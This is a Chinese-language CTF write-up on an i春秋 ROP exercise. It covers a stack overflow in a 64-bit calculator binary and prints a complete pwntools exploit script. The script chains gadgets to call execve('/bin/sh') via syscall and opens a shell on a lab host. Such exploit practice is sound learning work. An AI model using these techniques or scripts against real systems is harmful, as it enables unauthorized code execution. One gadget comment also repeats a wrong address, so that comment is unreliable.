i春秋上给的课后例题不错,近期打算把这上面的题刷一刷,巩固一下基础。还是一道简单的ROP练习题。
还是64位文件,保护措施是只开启了NX保护。
ida f5反汇编以后查看主函数
可以看到漏洞主要是在case5处的复制产生了栈溢出,程序里面没有system函数,所以可以先看一下能否使用系统调用
我们可以看到果然有syscall命令,这样就可以调用execve(“bin/sh”)函数获取shell,需要满足的条件如下:
- RAX:59
- RDI:RSP
- RSI:0
- RDX:0
我们需要找到下面的gadeget: - pop rax, ret
- pop rid, rdx, ret
- mov rsi, rsp
- syscall
脚本如下1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139#!/usr/bin/python
#coding:utf-8
from pwn import *
context.update(arch = 'amd64', os = 'linux', timeout = 1)
io = remote('172.17.0.3', 10001)
io.recv() #39次计算,ROP的长度
io.sendline('39')
#padding
for i in range(18):
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x44db34-->pop rax; ret
io.sendline('1')
io.sendline('2256282')
io.sendline('2256282')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x3b-->rax = 0x3b
io.sendline('2')
io.sendline('101')
io.sendline('42')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x401c87-->pop rsi; ret
io.sendline('1')
io.sendline('2100803')
io.sendline('2100804')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x0-->rsi = 0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x44db34-->pop rdx; ret
io.sendline('1')
io.sendline('2211138')
io.sendline('2211139')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x0-->rdx = 0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x400493-->pop r12; ret
io.sendline('1')
io.sendline('2097737')
io.sendline('2097738')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x44db34-->syscall; ret r12 = syscall address
io.sendline('1')
io.sendline('2303090')
io.sendline('2303091')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
#0x492468--> mov rdi, rsp; call r12
io.sendline('1')
io.sendline('2396724')
io.sendline('2396724')
sleep(0.1)
#地址高32位置0
io.sendline('2')
io.sendline('42')
io.sendline('42')
sleep(0.1)
# /bin/sh\0 => nib/ \0hs/ rdi = rsp-->"/bin/sh" address
io.sendline('1')
io.sendline('926200087')
io.sendline('926200088')
sleep(0.1)
io.sendline('1')
io.sendline('3422615')
io.sendline('3422616')
sleep(0.1)
io.sendline('5') #退出时程序将计算结果从堆复制到栈,劫持RIP到ROP链上
io.interactive()